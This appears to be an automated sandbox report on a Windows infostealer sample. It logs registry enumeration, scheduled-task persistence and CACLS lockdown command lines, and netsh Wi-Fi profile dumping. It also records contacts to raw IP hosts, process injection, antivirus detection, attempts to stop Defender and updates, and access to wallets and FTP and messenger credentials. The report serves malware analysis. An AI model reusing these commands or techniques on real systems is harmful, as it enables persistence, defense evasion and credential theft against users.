RegOpenKeyExW Nov. 3, 2023, 6:10 p.m.	regkey_r: ENTERPRISE base_handle: 0x00000458 key_handle: 0x0000045c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\ENTERPRISE	1
RegOpenKeyExW Nov. 3, 2023, 6:10 p.m.	regkey_r: Fontcore base_handle: 0x00000458 key_handle: 0x0000045c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore	1
RegOpenKeyExW Nov. 3, 2023, 6:10 p.m.	regkey_r: Google Chrome base_handle: 0x00000458 key_handle: 0x0000045c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome	1
RegOpenKeyExW Nov. 3, 2023, 6:10 p.m.	regkey_r: Haansoft HWord 80 Korean base_handle: 0x00000458 key_handle: 0x0000045c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean	1
RegOpenKeyExW Nov. 3, 2023, 6:10 p.m.	regkey_r: IE40 base_handle: 0x00000458 key_handle: 0x0000045c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE40	1
RegOpenKeyExW Nov. 3, 2023, 6:10 p.m.	regkey_r: IE4Data base_handle: 0x00000458 key_handle: 0x0000045c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data	1
RegOpenKeyExW Nov. 3, 2023, 6:10 p.m.	regkey_r: IE5BAKEX base_handle: 0x00000458 key_handle: 0x0000045c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX	1
RegOpenKeyExW Nov. 3, 2023, 6:10 p.m.	regkey_r: IEData base_handle: 0x00000458 key_handle: 0x0000045c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IEData	1
RegOpenKeyExW Nov. 3, 2023, 6:10 p.m.	regkey_r: MobileOptionPack base_handle: 0x00000458 key_handle: 0x0000045c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack	1
RegOpenKeyExW Nov. 3, 2023, 6:10 p.m.	regkey_r: SchedulingAgent base_handle: 0x00000458 key_handle: 0x0000045c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent	1
RegOpenKeyExW Nov. 3, 2023, 6:10 p.m.	regkey_r: WIC base_handle: 0x00000458 key_handle: 0x0000045c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\WIC	1
RegOpenKeyExW Nov. 3, 2023, 6:10 p.m.	regkey_r: {01B845D4-B73E-4CF7-A377-94BC7BB4F77B} base_handle: 0x00000458 key_handle: 0x0000045c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}	1
RegOpenKeyExW Nov. 3, 2023, 6:10 p.m.	regkey_r: {1D91F7DA-F517-4727-9E62-B7EA978BE980} base_handle: 0x00000458 key_handle: 0x0000045c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}	1
RegOpenKeyExW Nov. 3, 2023, 6:10 p.m.	regkey_r: {60EC980A-BDA2-4CB6-A427-B07A5498B4CA} base_handle: 0x00000458 key_handle: 0x0000045c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}	1
RegOpenKeyExW Nov. 3, 2023, 6:10 p.m.	regkey_r: {90120000-0015-0412-0000-0000000FF1CE} base_handle: 0x00000458 key_handle: 0x0000045c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0015-0412-0000-0000000FF1CE}	1
RegOpenKeyExW Nov. 3, 2023, 6:10 p.m.	regkey_r: {90120000-0016-0412-0000-0000000FF1CE} base_handle: 0x00000458 key_handle: 0x0000045c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0016-0412-0000-0000000FF1CE}	1
RegOpenKeyExW Nov. 3, 2023, 6:10 p.m.	regkey_r: {90120000-0018-0412-0000-0000000FF1CE} base_handle: 0x00000458 key_handle: 0x0000045c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0018-0412-0000-0000000FF1CE}	1
RegOpenKeyExW Nov. 3, 2023, 6:10 p.m.	regkey_r: {90120000-0019-0412-0000-0000000FF1CE} base_handle: 0x00000458 key_handle: 0x0000045c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0019-0412-0000-0000000FF1CE}	1
RegOpenKeyExW Nov. 3, 2023, 6:10 p.m.	regkey_r: {90120000-001A-0412-0000-0000000FF1CE} base_handle: 0x00000458 key_handle: 0x0000045c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001A-0412-0000-0000000FF1CE}	1
RegOpenKeyExW Nov. 3, 2023, 6:10 p.m.	regkey_r: {90120000-001B-0412-0000-0000000FF1CE} base_handle: 0x00000458 key_handle: 0x0000045c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001B-0412-0000-0000000FF1CE}	1
RegOpenKeyExW Nov. 3, 2023, 6:10 p.m.	regkey_r: {90120000-001F-0409-0000-0000000FF1CE} base_handle: 0x00000458 key_handle: 0x0000045c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0409-0000-0000000FF1CE}	1
RegOpenKeyExW Nov. 3, 2023, 6:10 p.m.	regkey_r: {90120000-001F-0412-0000-0000000FF1CE} base_handle: 0x00000458 key_handle: 0x0000045c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0412-0000-0000000FF1CE}	1
RegOpenKeyExW Nov. 3, 2023, 6:10 p.m.	regkey_r: {90120000-0028-0412-0000-0000000FF1CE} base_handle: 0x00000458 key_handle: 0x0000045c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0028-0412-0000-0000000FF1CE}	1
RegOpenKeyExW Nov. 3, 2023, 6:10 p.m.	regkey_r: {90120000-002C-0412-0000-0000000FF1CE} base_handle: 0x00000458 key_handle: 0x0000045c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-002C-0412-0000-0000000FF1CE}	1
RegOpenKeyExW Nov. 3, 2023, 6:10 p.m.	regkey_r: {90120000-0030-0000-0000-0000000FF1CE} base_handle: 0x00000458 key_handle: 0x0000045c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0030-0000-0000-0000000FF1CE}	1
RegOpenKeyExW Nov. 3, 2023, 6:10 p.m.	regkey_r: {90120000-0044-0412-0000-0000000FF1CE} base_handle: 0x00000458 key_handle: 0x0000045c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0044-0412-0000-0000000FF1CE}	1
RegOpenKeyExW Nov. 3, 2023, 6:10 p.m.	regkey_r: {90120000-006E-0409-0000-0000000FF1CE} base_handle: 0x00000458 key_handle: 0x0000045c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0409-0000-0000000FF1CE}	1
RegOpenKeyExW Nov. 3, 2023, 6:10 p.m.	regkey_r: {90120000-006E-0412-0000-0000000FF1CE} base_handle: 0x00000458 key_handle: 0x0000045c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0412-0000-0000000FF1CE}	1
RegOpenKeyExW Nov. 3, 2023, 6:10 p.m.	regkey_r: {90120000-00A1-0412-0000-0000000FF1CE} base_handle: 0x00000458 key_handle: 0x0000045c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00A1-0412-0000-0000000FF1CE}	1
RegOpenKeyExW Nov. 3, 2023, 6:10 p.m.	regkey_r: {90120000-00BA-0409-0000-0000000FF1CE} base_handle: 0x00000458 key_handle: 0x0000045c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00BA-0409-0000-0000000FF1CE}	1
RegOpenKeyExW Nov. 3, 2023, 6:10 p.m.	regkey_r: {90120000-0114-0412-0000-0000000FF1CE} base_handle: 0x00000458 key_handle: 0x0000045c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0114-0412-0000-0000000FF1CE}	1
RegOpenKeyExW Nov. 3, 2023, 6:10 p.m.	regkey_r: {939659F3-71D2-461F-B24D-91D05A4389B4} base_handle: 0x00000458 key_handle: 0x0000045c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{939659F3-71D2-461F-B24D-91D05A4389B4}	1
RegOpenKeyExW Nov. 3, 2023, 6:10 p.m.	regkey_r: {9B84A461-3B4C-40E2-B44F-CE22E215EE40} base_handle: 0x00000458 key_handle: 0x0000045c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{9B84A461-3B4C-40E2-B44F-CE22E215EE40}	1
RegOpenKeyExW Nov. 3, 2023, 6:10 p.m.	regkey_r: {d992c12e-cab2-426f-bde3-fb8c53950b0d} base_handle: 0x00000458 key_handle: 0x0000045c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{d992c12e-cab2-426f-bde3-fb8c53950b0d}	1
RegOpenKeyExW Nov. 3, 2023, 6:10 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall base_handle: 0x80000002 key_handle: 0x000002ec options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall	1
RegOpenKeyExW Nov. 3, 2023, 6:10 p.m.	regkey_r: AddressBook base_handle: 0x000002ec key_handle: 0x00000274 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook	1
RegOpenKeyExW Nov. 3, 2023, 6:10 p.m.	regkey_r: Connection Manager base_handle: 0x000002ec key_handle: 0x00000274 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager	1
RegOpenKeyExW Nov. 3, 2023, 6:10 p.m.	regkey_r: DirectDrawEx base_handle: 0x000002ec key_handle: 0x00000274 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx	1
RegOpenKeyExW Nov. 3, 2023, 6:10 p.m.	regkey_r: EditPlus base_handle: 0x000002ec key_handle: 0x00000274 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus	1
RegOpenKeyExW Nov. 3, 2023, 6:10 p.m.	regkey_r: ENTERPRISE base_handle: 0x000002ec key_handle: 0x00000274 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\ENTERPRISE	1
RegOpenKeyExW Nov. 3, 2023, 6:10 p.m.	regkey_r: Fontcore base_handle: 0x000002ec key_handle: 0x00000274 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore	1
RegOpenKeyExW Nov. 3, 2023, 6:10 p.m.	regkey_r: Google Chrome base_handle: 0x000002ec key_handle: 0x00000274 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome	1
RegOpenKeyExW Nov. 3, 2023, 6:10 p.m.	regkey_r: Haansoft HWord 80 Korean base_handle: 0x000002ec key_handle: 0x00000274 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean	1
RegOpenKeyExW Nov. 3, 2023, 6:10 p.m.	regkey_r: IE40 base_handle: 0x000002ec key_handle: 0x00000274 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE40	1
RegOpenKeyExW Nov. 3, 2023, 6:10 p.m.	regkey_r: IE4Data base_handle: 0x000002ec key_handle: 0x00000274 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data	1

Uses Windows utilities for basic Windows functionality (23 events)

cmdline	"C:\Program Files (x86)\Internet Explorer\iexplore.exe" -nohome
cmdline	"C:\Program Files (x86)\Internet Explorer\iexplore.exe" SCODEF:3544 CREDAT:145409
cmdline	SCHTASKS /Create /SC MINUTE /MO 1 /TN Utsysc.exe /TR "C:\Users\test22\AppData\Local\Temp\ea7c8244c8\Utsysc.exe" /F
cmdline	C:\Users\test22\AppData\Local\Temp\ea7c8244c8\Utsysc.exe
cmdline	"C:\Windows\System32\cmd.exe" /k echo Y\|CACLS "Utsysc.exe" /P "test22:N"&&CACLS "Utsysc.exe" /P "test22:R" /E&&echo Y\|CACLS "..\e8b5234212" /P "test22:N"&&CACLS "..\e8b5234212" /P "test22:R" /E&&Exit
cmdline	"C:\Program Files (x86)\Internet Explorer\iexplore.exe" SCODEF:3544 CREDAT:145411
cmdline	cmd /k echo Y\|CACLS "Utsysc.exe" /P "test22:N"&&CACLS "Utsysc.exe" /P "test22:R" /E&&echo Y\|CACLS "..\ea7c8244c8" /P "test22:N"&&CACLS "..\ea7c8244c8" /P "test22:R" /E&&Exit
cmdline	SCHTASKS /Create /SC MINUTE /MO 1 /TN Utsysc.exe /TR "C:\Users\test22\AppData\Local\Temp\e8b5234212\Utsysc.exe" /F
cmdline	"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\test22\AppData\Local\Temp\fefffe8cea\explothe.exe" /F
cmdline	"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN Utsysc.exe /TR "C:\Users\test22\AppData\Local\Temp\ea7c8244c8\Utsysc.exe" /F
cmdline	CACLS "Utsysc.exe" /P "test22:R" /E
cmdline	cmd /k echo Y\|CACLS "Utsysc.exe" /P "test22:N"&&CACLS "Utsysc.exe" /P "test22:R" /E&&echo Y\|CACLS "..\e8b5234212" /P "test22:N"&&CACLS "..\e8b5234212" /P "test22:R" /E&&Exit
cmdline	"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN Utsysc.exe /TR "C:\Users\test22\AppData\Local\Temp\e8b5234212\Utsysc.exe" /F
cmdline	"C:\Program Files (x86)\Internet Explorer\iexplore.exe" SCODEF:3544 CREDAT:79875
cmdline	C:\Windows\sysnative\cmd /c "C:\Users\test22\AppData\Local\Temp\EDD5.tmp\EDF6.tmp\EDF7.bat C:\Users\test22\AppData\Local\Temp\IXP000.TMP\7wT5Ey89.exe"
cmdline	CACLS "Utsysc.exe" /P "test22:N"
cmdline	C:\Users\test22\AppData\Local\Temp\e8b5234212\Utsysc.exe
cmdline	"C:\Users\test22\AppData\Local\Temp\e8b5234212\Utsysc.exe"
cmdline	"C:\Windows\System32\cmd.exe" /k echo Y\|CACLS "Utsysc.exe" /P "test22:N"&&CACLS "Utsysc.exe" /P "test22:R" /E&&echo Y\|CACLS "..\ea7c8244c8" /P "test22:N"&&CACLS "..\ea7c8244c8" /P "test22:R" /E&&Exit
cmdline	netsh wlan show profiles
cmdline	"C:\Users\test22\AppData\Local\Temp\ea7c8244c8\Utsysc.exe"
cmdline	"C:\Windows\sysnative\cmd.exe" /c "C:\Users\test22\AppData\Local\Temp\EDD5.tmp\EDF6.tmp\EDF7.bat C:\Users\test22\AppData\Local\Temp\IXP000.TMP\7wT5Ey89.exe"
cmdline	SCHTASKS /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\test22\AppData\Local\Temp\fefffe8cea\explothe.exe" /F

Communicates with host for which no DNS query was performed (14 events)

host	109.107.182.2
host	167.235.20.126
host	149.40.62.171
host	171.22.28.213
host	171.22.28.239
host	185.196.8.176
host	185.196.9.171
host	193.233.255.73
host	194.169.175.118
host	194.169.175.235
host	5.182.86.30
host	77.91.124.1
host	77.91.124.86
host	85.209.176.171

Creates an Alternate Data Stream (ADS) (1 event)

file	C:\Users\test22\AppData\Roaming\1000085000\V¯ÃDU p× fÈŒv»~-:)ù.exe

Allocates execute permission to another process indicative of possible code injection (3 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory Nov. 3, 2023, 6:10 p.m.	process_identifier: 3708 region_size: 40960 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000118	1
NtAllocateVirtualMemory Nov. 3, 2023, 6:10 p.m.	process_identifier: 3856 region_size: 208896 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000118	1
NtAllocateVirtualMemory Nov. 3, 2023, 6:10 p.m.	process_identifier: 3124 region_size: 245760 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000118	1

Attempts to identify installed AV products by installation directory (7 events)

file	C:\ProgramData\AVAST Software
file	C:\ProgramData\Avira
file	C:\ProgramData\Kaspersky Lab
file	C:\ProgramData\Panda Security
file	C:\ProgramData\Bitdefender
file	C:\ProgramData\AVG
file	C:\ProgramData\Doctor Web

Attempts to stop active services (2 events)

Time & API	Arguments	Status	Return	Repeated
ControlService Nov. 3, 2023, 6:10 p.m.	service_handle: 0x001faff0 service_name: WinDefend control_code: 1		0	0
ControlService Nov. 3, 2023, 6:10 p.m.	service_handle: 0x001fb4a0 service_name: wuauserv control_code: 1		0	0

Installs itself for autorun at Windows startup (12 events)

reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0	reg_value	rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\test22\AppData\Local\Temp\IXP000.TMP\"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1	reg_value	rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\test22\AppData\Local\Temp\IXP001.TMP\"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2	reg_value	rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\test22\AppData\Local\Temp\IXP002.TMP\"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3	reg_value	rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\test22\AppData\Local\Temp\IXP003.TMP\"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4	reg_value	rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\test22\AppData\Local\Temp\IXP004.TMP\"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup5	reg_value	rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\test22\AppData\Local\Temp\IXP005.TMP\"
cmdline	SCHTASKS /Create /SC MINUTE /MO 1 /TN Utsysc.exe /TR "C:\Users\test22\AppData\Local\Temp\ea7c8244c8\Utsysc.exe" /F
cmdline	SCHTASKS /Create /SC MINUTE /MO 1 /TN Utsysc.exe /TR "C:\Users\test22\AppData\Local\Temp\e8b5234212\Utsysc.exe" /F
cmdline	"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\test22\AppData\Local\Temp\fefffe8cea\explothe.exe" /F
cmdline	"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN Utsysc.exe /TR "C:\Users\test22\AppData\Local\Temp\ea7c8244c8\Utsysc.exe" /F
cmdline	"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN Utsysc.exe /TR "C:\Users\test22\AppData\Local\Temp\e8b5234212\Utsysc.exe" /F
cmdline	SCHTASKS /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\test22\AppData\Local\Temp\fefffe8cea\explothe.exe" /F

Detects Avast Antivirus through the presence of a library (2 events)

Time & API	Arguments	Status	Return	Repeated
LdrGetDllHandle Nov. 3, 2023, 6:10 p.m.	module_name: snxhk module_address: 0x00000000 stack_pivoted: 0		3221225781	0
LdrGetDllHandle Nov. 3, 2023, 6:10 p.m.	module_name: snxhk module_address: 0x00000000 stack_pivoted: 0		3221225781	0

Attempts to access Bitcoin/ALTCoin wallets (2 events)

file	C:\Users\test22\AppData\Roaming\Electrum\wallets
file	C:\Users\test22\AppData\Roaming\Litecoin\wallets

Attempts to disable Windows Auto Updates (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU\NoAutoUpdate

Harvests credentials from local FTP client softwares (3 events)

file	C:\Users\test22\AppData\Roaming\FileZilla\sitemanager.xml
file	C:\Users\test22\AppData\Roaming\FileZilla\recentservers.xml
registry	HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Harvests information related to installed instant messenger clients (25 events)

file	C:\Users\test22\AppData\Local\Temp\e8b5234212\.purple\accounts.xml
file	C:\Windows\.purple\accounts.xml
file	C:\util\Office.2010.Toolkit.and.EZ-Activator.v2.1.5.Final\.purple\accounts.xml
file	C:\Users\test22\AppData\Local\Temp\ea7c8244c8\.purple\accounts.xml
file	C:\Users\test22\AppData\Local\Temp\1000006001\.purple\accounts.xml
file	C:\Users\test22\AppData\Local\Temp\1000009001\.purple\accounts.xml
file	C:\Windows\System32\.purple\accounts.xml
file	C:\Program Files\Windows Photo Viewer\.purple\accounts.xml
file	C:\Program Files (x86)\Internet Explorer\.purple\accounts.xml
file	C:\util\.purple\accounts.xml
file	C:\Program Files (x86)\Microsoft Office\Office12\.purple\accounts.xml
file	C:\Program Files (x86)\Google\Chrome\Application\.purple\accounts.xml
file	C:\Windows\System32\wbem\.purple\accounts.xml
file	C:\Windows\SysWOW64\.purple\accounts.xml
file	C:\Python27\.purple\accounts.xml
file	C:\.purple\accounts.xml
file	C:\Program Files (x86)\Hnc\Hwp80\.purple\accounts.xml
file	C:\Program Files (x86)\EditPlus\.purple\accounts.xml
file	C:\Users\test22\AppData\Local\Temp\1000020001\.purple\accounts.xml
file	C:\Users\test22\AppData\Local\Temp\1000024001\.purple\accounts.xml
file	C:\SystemRoot\System32\.purple\accounts.xml
file	C:\Program Files\_Sandboxie\.purple\accounts.xml
file	C:\Program Files\Windows NT\Accessories\.purple\accounts.xml
file	C:\Users\test22\Downloads\.purple\accounts.xml
file	C:\Program Files\_Wireshark\.purple\accounts.xml

Potential code injection by writing to the memory of another process (11 events)

Time & API	Arguments	Status	Return
WriteProcessMemory Nov. 3, 2023, 6:10 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL¡$eà"0$þB `@ `¬BO`tA H.text# $ `.rsrc`&@@.reloc,@B base_address: 0x00400000 process_identifier: 3708 process_handle: 0x00000118	1	1
WriteProcessMemory Nov. 3, 2023, 6:10 p.m.	buffer: P8h`4VS_VERSION_INFO½ïþ?DVarFileInfo$Translation°lStringFileInfoH000004b0Comments"CompanyName6FileDescriptionoffDef0FileVersion1.0.0.06InternalNameoffDef.exeHLegalCopyrightCopyright © 2023*LegalTrademarks>OriginalFilenameoffDef.exe.ProductNameoffDef4ProductVersion1.0.0.08Assembly Version1.0.0.0¬cêï»¿<?xml version="1.0" encoding="UTF-8" standalone="yes"?> <assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/> <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2"> <security> <requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3"> <requestedExecutionLevel level="asInvoker" uiAccess="false"/> </requestedPrivileges> </security> </trustInfo> </assembly> base_address: 0x00406000 process_identifier: 3708 process_handle: 0x00000118	1	1
WriteProcessMemory Nov. 3, 2023, 6:10 p.m.	buffer: @3 base_address: 0x00408000 process_identifier: 3708 process_handle: 0x00000118	1	1
WriteProcessMemory Nov. 3, 2023, 6:10 p.m.	buffer: @ base_address: 0xfffde008 process_identifier: 3708 process_handle: 0x00000118	1	1
WriteProcessMemory Nov. 3, 2023, 6:10 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $à ¤ÿmY¤ÿmY¤ÿmYwnX¨ÿmYwhX2ÿmYwiX°ÿmYY¦ÿmYhXÿmYiXµÿmYnX°ÿmYwlX§ÿmY¤ÿlYðÿmY°dX´ÿmY°Y¥ÿmY°oX¥ÿmYRich¤ÿmYPELÊ¯Beà$ºA@@0@L(ààðô0à @@.textô) `.rdataxa@b.@@.dataH#°@À.rsrcàà@@.relocô0ð2 @B base_address: 0x00400000 process_identifier: 3856 process_handle: 0x00000118	1	1
